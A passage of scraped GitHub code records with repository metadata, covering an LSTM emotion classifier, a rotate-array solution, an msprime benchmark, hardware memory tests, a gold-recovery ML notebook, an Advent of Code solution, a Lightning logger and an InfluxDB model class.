LstmClassifier(embeddings, word_dict, embedding_size, hidden_size, emotion_class, batch_size,max_len, True, session, learning_rate=0.1)\r\n # 开始训练\r\n print(\"training\\n\")\r\n # 一共有多少批训练集\r\n train_batch = int(len(train_responses) / batch_size)\r\n # 一共有多少批验证集\r\n valid_batch = int(len(valid_res) / batch_size)\r\n valid_accs = []\r\n best_valid_acc = -1.0\r\n ckpt_path = os.path.join(FLAGS.checkpoint_path, \"check_path_lstm\")\r\n # 开始训练\r\n for i in range(num_epoch):\r\n print(\"Now train epoch %d!\\n\" % (i + 1))\r\n # 首先随机排序,即打乱顺序\r\n train_responses, train_labels, train_lens = shuffle_train_data(train_responses, train_labels, train_lens)\r\n\r\n for j in range(train_batch):\r\n # 处理输入,处理成能直接喂进去的形式\r\n this_res, this_label, this_len = lstm_emotion_machine.get_train_batch(train_responses, train_labels,\r\n train_lens, j)\r\n # 计算损失\r\n loss = lstm_emotion_machine.train_step(this_res, this_label, this_len)\r\n print(\"epoch=%d, batch=%d, loss=%f\\n\" % ((i + 1), (j + 1), loss))\r\n # 验证集验证开始\r\n labels = []\r\n for k in range(valid_batch):\r\n this_res, this_label, this_len = lstm_emotion_machine.get_train_batch(valid_res, valid_labels,\r\n valid_lens, k)\r\n # 输出预测出来的labels,可能有多个?\r\n this_labels = lstm_emotion_machine.predict_step(this_res, this_len)\r\n labels.extend(this_labels)\r\n # 计算准确度\r\n accuracy = compute_accuracy(labels, valid_labels)\r\n print(\"epoch=%d, accuracy=%f\\n\" % ((i + 1), accuracy))\r\n valid_accs.append(accuracy)\r\n # 保存这次的结果\r\n if best_valid_acc < accuracy:\r\n best_valid_acc = accuracy\r\n lstm_emotion_machine.saver.save(lstm_emotion_machine.sess, ckpt_path, global_step=(i + 1) * train_batch)\r\n #lstm_emotion_machine.save_weights(FLAGS.checkpoint_path)\r\n # 取最好的和平均的准确率\r\n best_acc = np.max(valid_accs)\r\n ave_acc = np.average(valid_accs)\r\n print(\"best acc=%f, average acc=%f\\n\" % (best_acc, ave_acc))\r\n\r\n #开始测试\r\n # restore_path = lstm_emotion_machine.saver.last_checkpoints[-1]\r\n # lstm_emotion_machine.saver.restore(lstm_emotion_machine.sess, restore_path)\r\n #\r\n #\r\n # restore_path = lstm_emotion_machine.saver.last_checkpoints[0]\r\n # checkpoint_path = os.path.join(os.path.join(model_path, \"data_utils/check_path_lstm\"), \"check_path_lstm-11728\")\r\n #\r\n # lstm_emotion_machine.saver.restore(lstm_emotion_machine.sess, checkpoint_path)\r\n pred_batches = int(len(test_responses) / batch_size)\r\n total_labels = []\r\n for k in range(pred_batches):\r\n # 处理输入\r\n this_res, this_len = lstm_emotion_machine.get_pred_batch(test_responses, test_lens, k)\r\n # 输出预测的labels\r\n this_labels = lstm_emotion_machine.predict_step(this_res, this_len)\r\n total_labels.extend(this_labels)\r\n\r\n print(\"check here length\")\r\n print(len(test_responses))\r\n print(len(total_labels))\r\n last_ckpt = lstm_emotion_machine.saver.last_checkpoints\r\n print(\"test here\")\r\n print(last_ckpt)\r\n write_labels(pred_label_file, total_labels)\r\n\r\n return lstm_emotion_machine\r\n # print(len(total_labels))\r\n\r\n\r\n\r\n\r\ndef main(_):\r\n with tf.device(\"/gpu:1\"):\r\n sess = tf.Session(config=tf.ConfigProto(\r\n allow_soft_placement=True, log_device_placement=True))\r\n train(FLAGS.config_file,FLAGS.train_response_file, FLAGS.train_label_file, FLAGS.test_response_file, FLAGS.test_label_file,\r\n FLAGS.max_len, FLAGS.word_count_file, FLAGS.vocab_size, FLAGS.embedding_file, FLAGS.embedding_size,\r\n FLAGS.batch_size, FLAGS.num_epoch, FLAGS.hidden_size, FLAGS.emotion_class, FLAGS.pred_label_file,FLAGS.pre_train_word_count_file,FLAGS.emotion_words_dir, sess)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n model_path = os.path.dirname(os.path.dirname(os.path.abspath(\"lstm_classifier.py\")))\r\n data_dir = os.path.join(model_path, \"data\")\r\n\r\n parse = argparse.ArgumentParser()\r\n parse.add_argument(\"--train_response_file\", type=str,\r\n default=os.path.join(data_dir, \"stc_data/test/utt123_trans_CN_jieba.txt\"))\r\n parse.add_argument(\"--train_label_file\", type=str,\r\n default=os.path.join(data_dir, \"stc_data/test/utt123_emo_CN.txt\"))\r\n # parse.add_argument(\"--test_response_file\", type=str,\r\n # default=\"/Users/zhouziyi/Desktop/Lab/Graduate Design/corpus/douban/post.without.txt\")\r\n parse.add_argument(\"--test_response_file\", type=str,\r\n default=os.path.join(data_dir, \"stc_data/test/trans/gen_ex_pre.final.txt\"))\r\n # test label是用于计算测试准确度的,不涉及别的\r\n parse.add_argument(\"--test_label_file\", type=str,\r\n default=os.path.join(data_dir, \"stc_data/train_test/test.label.lstm.filter.txt\"))\r\n parse.add_argument(\"--max_len\", type=int, default=15)\r\n # word_count_file并没有用处\r\n parse.add_argument(\"--word_count_file\", type=str,\r\n default=os.path.join(data_dir, \"emotion_words_human/word.count.7.120.CN.txt\"))\r\n parse.add_argument(\"--vocab_size\", type=int, default=40000)\r\n parse.add_argument(\"--embedding_file\", type=str,\r\n default=os.path.join(data_dir, \"embedding/7_classes_trans_metric.txt\"),\r\n help=\"word embedding file path\")\r\n parse.add_argument(\"--embedding_size\", type=int, default=50)\r\n parse.add_argument(\"--batch_size\", type=int, default=8)\r\n parse.add_argument(\"--num_epoch\", type=int, default=500)\r\n parse.add_argument(\"--hidden_size\", type=int, default=256)\r\n parse.add_argument(\"--emotion_class\", type=int, default=7)\r\n # pred_label_file并没有用处\r\n parse.add_argument(\"--pred_label_file\", type=str, default=os.path.join(data_dir, \"com_data/5-19-check/generated_sentences_2.final_lstm_classifier.txt\"))\r\n parse.add_argument(\"--unk\", type=str, default=\"\", help=\"symbol for unk words\")\r\n parse.add_argument(\"--start_symbol\", type=str, default=\"\", help=\"symbol for response sentence start\")\r\n parse.add_argument(\"--end_symbol\", type=str, default=\"\", help=\"symbol for response sentence end\")\r\n parse.add_argument(\"--learning_rate\", type=float, default=0.1)\r\n parse.add_argument(\"--checkpoint_path\", type=str, default=os.path.join(model_path, \"data_utils/check_path_lstm_ori_ex\"))\r\n # parse.add_argument(\"--checkpoint_path\", type=str, default=os.path.join(model_path, \"data_utils\"))\r\n parse.add_argument(\"--pre_train_word_count_file\", type=str,\r\n default=os.path.join(data_dir, \"emotion_words_human/word.count.7.120.CN.txt\"),\r\n help=\"nlp cc word count file\")\r\n parse.add_argument(\"--emotion_words_dir\", type=str,\r\n default=os.path.join(data_dir, \"emotion_words_human/7_class_CN_120\"),\r\n help=\"emotion words directory\")\r\n parse.add_argument(\"--config_file\", type=str, default=os.path.join(model_path, \"conf/dialogue1.conf\"),\r\n help=\"configuration file path\")\r\n\r\n FLAGS, unparsed = parse.parse_known_args()\r\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"slptongji/GERP","sub_path":"data_utils/lstm_classifier.py","file_name":"lstm_classifier.py","file_ext":"py","file_size_in_byte":42240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73291037034","text":"class Solution:\n # Simpler way: find new index for each element based on len and k\n # Since we don't want to lose data, store values in new auxillary array\n # Then, since we are modifying the input array, copy the values over\n # Complexity: Time O(n) Space O(n)\n def rotatee(self, nums: List[int], k: int) -> None:\n L = len(nums)\n aux = [0 for i in range(L)]\n for i in range(L):\n aux[(i + k) % L] = nums[i]\n for i in range(L):\n nums[i] = aux[i]\n\n # Math trick: Reverse array, then reverse array from [0, k) and [k, len)\n # Complexity: Time O(n) Space O(1)\n def reverse(self, nums: List[int], i: int, j: int):\n while (i < j):\n nums[i], nums[j] = nums[j], nums[i]\n i += 1\n j -= 1\n \n def rotate(self, nums: List[int], k: int) -> None:\n L = len(nums)\n if L < 2:\n return\n k %= L\n self.reverse(nums, 0, L - 1)\n self.reverse(nums, 0, k - 1)\n self.reverse(nums, k, L - 1)","repo_name":"jwestfromtheeast/CodingChallenges","sub_path":"python/easy/189RotateArray.py","file_name":"189RotateArray.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40961554485","text":"import msprime\nimport numpy as np\nimport sys\nimport timeit\nimport time\nimport struct\n\nprint(msprime.__file__,msprime.__version__)\n\nnodes = msprime.NodeTable()\nedges = msprime.EdgeTable()\n\ng = []\nwith open(sys.argv[1],\"rb\") as f:\n print(sys.argv[1])\n while True:\n a=struct.unpack('i',f.read(4))\n if a[0]==-1:\n break\n t=struct.unpack('d',f.read(8))\n g.append(t[0])\n # for line in f:\n # l = line.rstrip().split(\" \")\n # g.append(float(l[1]))\ntimes = np.array(g)\ntimes -= times.max()\ntimes *= -1.0\n\nnodes.append_columns(time=times,flags=[-1]*len(times))\n\np = []\nc = []\nl = []\nr = []\n\nwith open(sys.argv[2],\"rb\") as f:\n while True:\n pi=struct.unpack('i',f.read(4))\n if pi[0] == -1:\n break\n ci=struct.unpack('i',f.read(4))\n li=struct.unpack('d',f.read(8))\n ri=struct.unpack('d',f.read(8))\n p.append(pi[0])\n c.append(ci[0])\n l.append(li[0])\n r.append(ri[0])\n\nedges.set_columns(parent=p,child=c,left=l,right=r)\n\n\nN=int(sys.argv[3])\n#samples=[i for i in range(len(times)-2*N,len(times))] \nsamples=[i for i in range(0,len(times),132)]\nts=None\n\nA=time.time()\nmsprime.sort_tables(nodes=nodes,edges=edges)\nB=time.time()\nts=msprime.simplify_tables(nodes=nodes,edges=edges,samples=samples)\nC=time.time()\n\nprint(\"Sorting: \",B-A,\"seconds\")\nprint(\"Simplifying: \",C-B,\"seconds\")\n\n\nwith open(sys.argv[4],'w') as f:\n for i in edges:\n f.write(\"{} {} {:.6f} {:.6f}\\n\".format(i.parent,i.child,i.left,i.right,nodes[i.parent].time))\nwith open(sys.argv[5],'w') as f:\n for i in nodes:\n f.write(\"{}\\n\".format(i.time))\n\n\n","repo_name":"molpopgen/fwdpp_experimental","sub_path":"check_fwd_sim_data_with_msprime.py","file_name":"check_fwd_sim_data_with_msprime.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41678057686","text":"import unittest\n\nfrom naps import SimPlatform, SocMemory, axil_read, axil_write, do_nothing, SimSocPlatform\nfrom naps.soc.platform.zynq import ZynqSocPlatform\n\n\nclass SocMemoryTest(unittest.TestCase):\n def test_smoke(self):\n platform = ZynqSocPlatform(SimPlatform())\n\n dut = SocMemory(width=32, depth=128)\n\n def testbench():\n axi = platform.axi_lite_master\n memorymap = platform.memorymap\n for addr in range(128):\n yield from axil_write(axi, 4*addr + 0x40000000, addr)\n for addr in range(128):\n self.assertEqual(addr, (yield from axil_read(axi, 4*addr + 0x40000000)))\n\n platform.sim(dut, (testbench, \"axi_lite\"))\n\n def test_with_driver(self):\n platform = SimSocPlatform(SimPlatform())\n\n dut = SocMemory(width=64, depth=128)\n\n def driver(design):\n for i in range(128):\n design[i] = i * i << 30\n yield from do_nothing(10)\n for i in reversed(range(128)):\n self.assertEqual(design[i], i * i << 30)\n yield from do_nothing(10)\n platform.add_driver(driver)\n\n platform.sim(dut)\n","repo_name":"apertus-open-source-cinema/naps","sub_path":"naps/cores/peripherals/soc_memory_test.py","file_name":"soc_memory_test.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"72"} +{"seq_id":"31489421760","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import make_scorer\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.ensemble import RandomForestRegressor\n\n#Импорт данных обучающей выборки\ndf_train=pd.read_csv('gold_recovery_train_new.csv')\ndf_train_clear=df_train.fillna(value=None, method=\"ffill\")\nprint(df_train_clear.isna().sum()*100/len(df_train))\n#Импорт данных тестовой выборки\ndf_test=pd.read_csv('gold_recovery_test.csv')\ndf_test=df_test.fillna(value=None, method=\"ffill\")\nprint(df_test.isna().sum()*100/len(df_test))\n#Импорт данных полной выборки выборки\ndf_full=pd.read_csv('/datasets/gold_recovery_full_new.csv')\ndf_full=df_full.fillna(value=None, method=\"ffill\")\nprint(df_full.isnull().sum()*100/len(df_full))\n\n#анализ параметров, не используемых в тестовой выборке\ndf_traincs=df_train.columns\ndf_testcs=df_test.columns\ndf_diff=[]\nfor train in df_traincs:\n if train not in df_testcs:\n df_diff.append(train)\nprint(df_diff)\n\n#Очистка данных\ndf_train_clear1=df_train\ndf_train_clear1=df_train.dropna()\n\n#Оценка эффективности обогащения\nF=df_train_clear1['rougher.input.feed_au']\nprint(F.isna().value_counts())\nC=df_train_clear1['rougher.output.concentrate_au']\nprint(C.isna().value_counts())\nT=df_train_clear1['rougher.output.tail_au']\nprint(T.isna().value_counts())\nA=C*(F-T)\nprint(A.isna().value_counts())\nB=F*(C-T)\nprint(B.isna().value_counts())\ndf_train_clear1['rougher_recovery']=(A/B)*100\nprint(df_train_clear1['rougher_recovery'].isna().value_counts())\nprint(mean_absolute_error(df_train_clear1['rougher.output.recovery'], df_train_clear1['rougher_recovery']))\n\n#Сравнение концентрации материалов на каждом этапе очистки\nprint(\"------------------------------------------------------\")\nprint(\"Средняя концентрация свинца после флотации\", df_full[\"rougher.output.concentrate_pb\"].mean())\nprint(\"Средняя концентрация свинца после первичного этапа очистки\", df_full['primary_cleaner.output.concentrate_pb'].mean())\nprint(\"Средняя концентрация свинца на выходе\", df_full[\"final.output.concentrate_pb\"].mean())\nprint(\"------------------------------------------------------\")\nprint(\"Средняя концентрация серебра после флотации\", df_full[\"rougher.output.concentrate_ag\"].mean())\nprint(\"Средняя концентрация серебра после первичного этапа очистки\", df_full['primary_cleaner.output.concentrate_ag'].mean())\nprint(\"Средняя концентрация серебра на выходе\", df_full[\"final.output.concentrate_ag\"].mean())\nprint(\"------------------------------------------------------\")\nprint(\"Средняя концентрация золота после флотации\", df_full[\"rougher.output.concentrate_au\"].mean())\nprint(\"Средняя концентрация золота после первичного этапа очистки\", df_full['primary_cleaner.output.concentrate_au'].mean())\nprint(\"Средняя концентрация золота на выходе\", df_full[\"final.output.concentrate_au\"].mean())\n\n#Сравнение распределений размеров гранул сырья\nplt.title(\"Сравнение распределений размеров гранул сырья золота\")\nsns.set(style=\"darkgrid\")\nfig = sns.kdeplot(df_train[\"rougher.output.concentrate_au\"], shade=True, color=\"r\")\nfig = sns.kdeplot(df_train[\"primary_cleaner.output.concentrate_au\"], shade=True, color=\"b\")\nfig = sns.kdeplot(df_train[\"final.output.concentrate_au\"], shade=True, color=\"g\")\nplt.legend(['Флотация', 'Первичная очистка', \"На выходе\" ], loc=1)\nplt.show()\n\nplt.title(\"Сравнение распределений размеров гранул сырья серебра\")\nsns.set(style=\"darkgrid\")\nfig = sns.kdeplot(df_train[\"rougher.output.concentrate_ag\"], shade=True, color=\"r\")\nfig = sns.kdeplot(df_train[\"primary_cleaner.output.concentrate_ag\"], shade=True, color=\"b\")\nfig = sns.kdeplot(df_train[\"final.output.concentrate_ag\"], shade=True, color=\"g\")\nplt.legend(['Флотация', 'Первичная очистка', \"На выходе\" ], loc=1)\nplt.show()\n\nplt.title(\"Сравнение распределений размеров гранул сырья свинца\")\nsns.set(style=\"darkgrid\")\nfig = sns.kdeplot(df_train[\"rougher.output.concentrate_pb\"], shade=True, color=\"r\")\nfig = sns.kdeplot(df_train[\"primary_cleaner.output.concentrate_pb\"], shade=True, color=\"b\")\nfig = sns.kdeplot(df_train[\"final.output.concentrate_pb\"], shade=True, color=\"g\")\nplt.legend(['Флотация', 'Первичная очистка', \"На выходе\" ], loc=1)\nplt.show()\n\nplt.title(\"Сравнение распределений размеров гранул сырья на выборках\")\nsns.set(style=\"darkgrid\")\nfig = sns.kdeplot(df_train['rougher.input.feed_size'], shade=True, color=\"r\")\nfig = sns.kdeplot(df_test['rougher.input.feed_size'], shade=True, color=\"b\")\nplt.legend(['Обучающая выборка', 'Тестовая выборка'], loc=1)\nplt.show()\n\n#Сравнение концентраций металлов на разных этапах обработки\ndf_train_clear1['input']=df_train_clear1['rougher.input.feed_ag']+df_train_clear1['rougher.input.feed_pb']+df_train_clear1['rougher.input.feed_au']\\\n +df_train_clear1['rougher.input.feed_sol']\ndf_train_clear1['rougher']=df_train_clear1['rougher.output.concentrate_ag']+df_train_clear1['rougher.output.concentrate_pb']+df_train_clear1['rougher.output.concentrate_au']\\\n +df_train_clear1['rougher.output.concentrate_sol']\ndf_train_clear1['black']=df_train_clear1['primary_cleaner.output.concentrate_ag']+df_train_clear1['primary_cleaner.output.concentrate_pb']\\\n +df_train_clear1['primary_cleaner.output.concentrate_au']+df_train_clear1['primary_cleaner.output.concentrate_sol']\ndf_train_clear1['finale']=df_train_clear1['final.output.concentrate_ag']+df_train_clear1['final.output.concentrate_pb']+df_train_clear1['final.output.concentrate_au']\\\n +df_train_clear1['final.output.concentrate_sol']\n#Графическое представление полученных результатов\nfig = plt.subplots(figsize=(20, 7))\nfig = sns.distplot(a=df_train_clear1['rougher'], hist=True, kde=True, rug=False , color=\"r\")\nfig = sns.distplot(a=df_train_clear1['black'], hist=True, kde=True, rug=False , color=\"g\")\nfig = sns.distplot(a=df_train_clear1['finale'], hist=True, kde=True, rug=False , color=\"b\")\nfig = sns.distplot(a=df_train_clear1['input'], hist=True, kde=True, rug=False , color=\"y\")\nplt.legend(['rougher', 'primary', 'final', 'input'], loc=1)\nplt.show()\n#Отброс выброса\ndf_train_clear1=df_train_clear1.query('rougher > 20 & black>20 & finale>20 & input >20')\ndf_train_clear1['final_recovery']=df_train_clear1['final.output.recovery']\ndf_train_clear1=df_train_clear1.query('50 < final_recovery < 95')\nprint(df_train_clear1.shape)\n\n#Статистические показатели обучающей выборки\ndf_train_clear1.boxplot('final.output.recovery')\ndf_train_clear1['final.output.recovery'].describe()\n\n#ML\n#Задание кастомной метрики\ndef smape(A, F):\n return 100/len(A) * np.sum(2 * np.abs(F - A) / (np.abs(A) + np.abs(F)))\n\ntotal_smape=0.25*smape_rougher+0.75*smape_final1\nprint('Итоговое симметричное среднее абсолютное процентное отклонение', total_smape)\n\n#Подготовка фичей и таргетов выборок\ntrain_target1=df_train_clear1['rougher.output.recovery']\ntrain_target2=df_train_clear1['final_recovery']\ntrain_features=df_train_clear1[df_test.columns].drop('date', axis=1)\nprint(train_features.shape)\n\ndf_full_target=df_full[['date','rougher.output.recovery','final.output.recovery']]\ndf_test_ready = df_test.merge(df_full_target, on='date', how='left')\ndf_test_ready=df_test_ready.dropna()\n\ntest_features=df_test_ready.drop(['date','rougher.output.recovery', 'final.output.recovery'], axis=1)\ntest_target1=df_test_ready['rougher.output.recovery']\ntest_target2=df_test_ready['final.output.recovery']\nprint(test_features.shape)\n\n#Обучения моделей\n#Линейная регрессия\nmodel_lr =LinearRegression()\nmodel_lr.fit(train_features, train_target1)\nresult=model_lr.predict(test_features)\nsmape1=smape(test_target1, result)\nprint(smape1)\n\nmodel_lr1 =LinearRegression()\nmodel_lr1.fit(train_features, train_target2)\nresult1=model_lr.predict(test_features)\nsmape2=smape(test_target2, result1)\nprint(smape2)\n\n#Случайный лес (подбор параметров вставлять не стал) с кросс-валидацией\nmodel_rougher=RandomForestRegressor(random_state=12345, n_estimators=40, max_depth=1)\nmodel_rougher.fit(train_features, train_target1)\nresult=model_rougher.predict(test_features)\nsmape_rougher=smape(test_target1, result)\nscores_rougher = cross_val_score(model_rougher, test_features, result, cv=5)\nfinal_score = scores_rougher.mean()\nprint(smape_rougher)\nprint(scores_rougher)\n\nmodel_final1=RandomForestRegressor(random_state=12345, n_estimators=40, max_depth=7)\nmodel_final1.fit(train_features, train_target2)\nresult=model_final1.predict(test_features)\nsmape_final1=smape(test_target2, result)\nscores_final = cross_val_score(model_final1, test_features, result, cv=5)\nfinal_score1 = scores_final.mean()\nprint(smape_final1)\nprint(final_score1)\n\n#Инициализация подбора гиперпараметров линейной регрессии\nscores = make_scorer(smape, greater_is_better = False)\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import make_scorer\n\n\ndef lr_gridsearchcv(features, target, scores):\n model = LinearRegression()\n param_grid = {\n 'copy_X': [True, False],\n 'fit_intercept': [True, False],\n 'normalize': [True, False]\n }\n my_scorer = make_scorer(scores, greater_is_better=False)\n CV = GridSearchCV(estimator=model, param_grid=param_grid, cv=5, scoring=my_scorer)\n CV.fit(features, target)\n print('Лучшее значение метрики: {:.2f}'.format(-CV.best_score_))\n print('Лучшие гиперпараметры: ', CV.best_params_)\n return CV.best_params_\nlr_gridsearchcv(train_features, train_target1, smape)\nlr_gridsearchcv(train_features, train_target2, smape)\n\n#Сравнение результатов линейной регрессии с подобранными гиперпараметрами (которыепо сути дефолтные, не зря учил)\nmodel_final=LinearRegression(copy_X=True, normalize = True)\nmodel_final.fit(train_features, train_target2)\nresult1=model_final.predict(test_features)\nsmape_final=smape(test_target2, result1)\nscores_final = cross_val_score(model_final, test_features, result1, cv=5)\nfinal_score1 = scores_final.mean()\nprint(smape_final)\n\n\n#Сравнение полученных результатов с дамми\nfrom sklearn.dummy import DummyRegressor\ndummy_regressor_rougher = DummyRegressor(strategy=\"median\")\ndummy_regressor_rougher.fit(train_features, train_target2)\ndummy_rougher_pred = dummy_regressor_rougher.predict(test_features)\nsmape_dummy_rougher = smape(test_target2, dummy_rougher_pred)\n\nprint(smape_dummy_rougher)\n\ndummy_regressor_final = DummyRegressor(strategy=\"median\")\ndummy_regressor_final.fit(train_features, train_target1)\ndummy_final_pred = dummy_regressor_final.predict(test_features)\nsmape_dummy_final = smape(test_target1, dummy_final_pred)\n\nprint(smape_dummy_final)\n\ntotal_smape=0.25*smape_dummy_rougher+0.75*smape_dummy_final\nprint(total_smape)","repo_name":"PTyneu/Gold","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":12279,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41763357407","text":"# ********************************************* #\n# Advent of Code Day 9 #\n# Trevor Loula #\n# Cedarville University Leaderboard #\n# ********************************************* #\n\n# Sliding Window Two-Sum\n\nimport sys\n\nclass Day9:\n\n def __init__(self, window_size):\n self.lines = list(int(line.strip()) for line in open('input/day-9.txt'))\n self.window_size = window_size\n self.target = 0\n\n @staticmethod\n def two_sum(nums, target):\n for num in nums:\n complement = int(target) - int(num)\n if complement in nums: return [num, complement]\n return False\n\n def part_1(self):\n for i in range(self.window_size, len(self.lines)):\n if not Day9.two_sum(self.lines[i-self.window_size:i], self.lines[i]):\n self.target = self.lines[i]\n return self.target\n print(\"No number without property\")\n\n def part_2(self):\n for lo in range(len(self.lines)):\n cont_sum = 0\n for hi in range(lo, len(self.lines)):\n cont_sum += self.lines[hi]\n if cont_sum == self.target:\n return min(self.lines[lo:hi]) + max(self.lines[lo:hi])\n elif cont_sum > self.target:\n break\n print(\"Contiguous sum not found\")\n\ndef main(args):\n if len(args) != 2:\n print(\"Usage: python day-9.py window_size\")\n\n day_9 = Day9(int(args[1]))\n num_1 = day_9.part_1()\n num_2 = day_9.part_2()\n\n print(\"First number without property:\", num_1)\n print(\"Sum of min and max numbers in contiguous set adding to target:\", num_2)\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"tloula/advent-of-code","sub_path":"day-9.py","file_name":"day-9.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34737494353","text":"print('GERADOR DE PA')\nprint('-'*7)\nprimeiro = int(input('Primeiro termo: '))\nrazao = int(input('Razão: '))\ntermo = primeiro\ncont = 1\nlimite = 11\nwhile cont <= limite:\n print('{} -> '.format(termo),end='')\n termo += + razao\n cont += 1\n if limite == cont:\n l2 = int(input('PAUSE\\nQuantos mais?'))\n limite += + l2\nprint('CONSEGUI PORRA')\n","repo_name":"RaoniSilvestre/Exercicios-Python","sub_path":"mundo-2/ex061b.py","file_name":"ex061b.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6137605349","text":"from pytorch_lightning.utilities import rank_zero_only\nfrom pytorch_lightning.loggers import LightningLoggerBase\nimport pandas as pd\nfrom IPython.display import DisplayHandle\n\nclass TableLogger(LightningLoggerBase):\n def __init__(self, name='TableLogger', version=None):\n super().__init__()\n self.table = pd.DataFrame()\n self.metrics = []\n self.val_metrics = {}\n self.display_handle = DisplayHandle()\n self._version = version\n self._experiment = self.table\n self._name = name\n\n def average_metrics(self):\n avg_metrics = {key: np.mean([m[key] for m in self.metrics])\n for key in self.metrics[0].keys()}\n avg_metrics.update(self.val_metrics)\n self.table = self.table.append(avg_metrics, ignore_index=True)\n self.metrics = []\n\n def display(self):\n if len(self.table) == 1:\n self.display_handle.display(self.table)\n else:\n self.display_handle.update(self.table)\n\n @rank_zero_only\n def log_hyperparams(self, params):\n # Save hparams into the logger dir\n # Calls logger.save afterwards\n pass\n\n @rank_zero_only\n def log_metrics(self, metrics, step):\n if 'val/loss' in metrics:\n self.val_metrics = metrics\n self.average_metrics()\n self.display()\n else:\n self.metrics.append(metrics)\n\n @rank_zero_only\n def finalize(self, status):\n self.agg_and_log_metrics(None)\n if len(self.metrics) > 0:\n self.average_metrics()\n self.display_handle.update(self.table)\n self.save()\n\n def save(self):\n self.table.to_csv(f'{self.name}/version_{self.version}/logs.csv', index=False)\n\n @property\n def experiment(self):\n return self._experiment\n\n @property\n def name(self):\n return self._name\n\n @property\n def version(self):\n if self._version is None:\n self._version = max(int(re.search(r'\\d+$', str(v)).group()) for v in Path(self.name).iterdir())+1\n return self._version\n","repo_name":"ttumiel/components","sub_path":"components/lightning/table_logger.py","file_name":"table_logger.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29085062098","text":"# coding: utf-8\n\n\"\"\"\nInfluxDB OSS API Service.\n\nThe InfluxDB v2 API provides a programmatic interface for all interactions with InfluxDB. Access the InfluxDB API using the `/api/v2/` endpoint. # noqa: E501\n\nOpenAPI spec version: 2.0.0\nGenerated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\n\nclass VariableLinks(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n '_self': 'str',\n 'org': 'str',\n 'labels': 'str'\n }\n\n attribute_map = {\n '_self': 'self',\n 'org': 'org',\n 'labels': 'labels'\n }\n\n def __init__(self, _self=None, org=None, labels=None): # noqa: E501,D401,D403\n \"\"\"VariableLinks - a model defined in OpenAPI.\"\"\" # noqa: E501\n self.__self = None\n self._org = None\n self._labels = None\n self.discriminator = None\n\n if _self is not None:\n self._self = _self\n if org is not None:\n self.org = org\n if labels is not None:\n self.labels = labels\n\n @property\n def _self(self):\n \"\"\"Get the _self of this VariableLinks.\n\n :return: The _self of this VariableLinks.\n :rtype: str\n \"\"\" # noqa: E501\n return self.__self\n\n @_self.setter\n def _self(self, _self):\n \"\"\"Set the _self of this VariableLinks.\n\n :param _self: The _self of this VariableLinks.\n :type: str\n \"\"\" # noqa: E501\n self.__self = _self\n\n @property\n def org(self):\n \"\"\"Get the org of this VariableLinks.\n\n :return: The org of this VariableLinks.\n :rtype: str\n \"\"\" # noqa: E501\n return self._org\n\n @org.setter\n def org(self, org):\n \"\"\"Set the org of this VariableLinks.\n\n :param org: The org of this VariableLinks.\n :type: str\n \"\"\" # noqa: E501\n self._org = org\n\n @property\n def labels(self):\n \"\"\"Get the labels of this VariableLinks.\n\n :return: The labels of this VariableLinks.\n :rtype: str\n \"\"\" # noqa: E501\n return self._labels\n\n @labels.setter\n def labels(self, labels):\n \"\"\"Set the labels of this VariableLinks.\n\n :param labels: The labels of this VariableLinks.\n :type: str\n \"\"\" # noqa: E501\n self._labels = labels\n\n def to_dict(self):\n \"\"\"Return the model properties as a dict.\"\"\"\n result = {}\n\n for attr, _ in self.openapi_types.items():\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Return the string representation of the model.\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`.\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Return true if both objects are equal.\"\"\"\n if not isinstance(other, VariableLinks):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Return true if both objects are not equal.\"\"\"\n return not self == 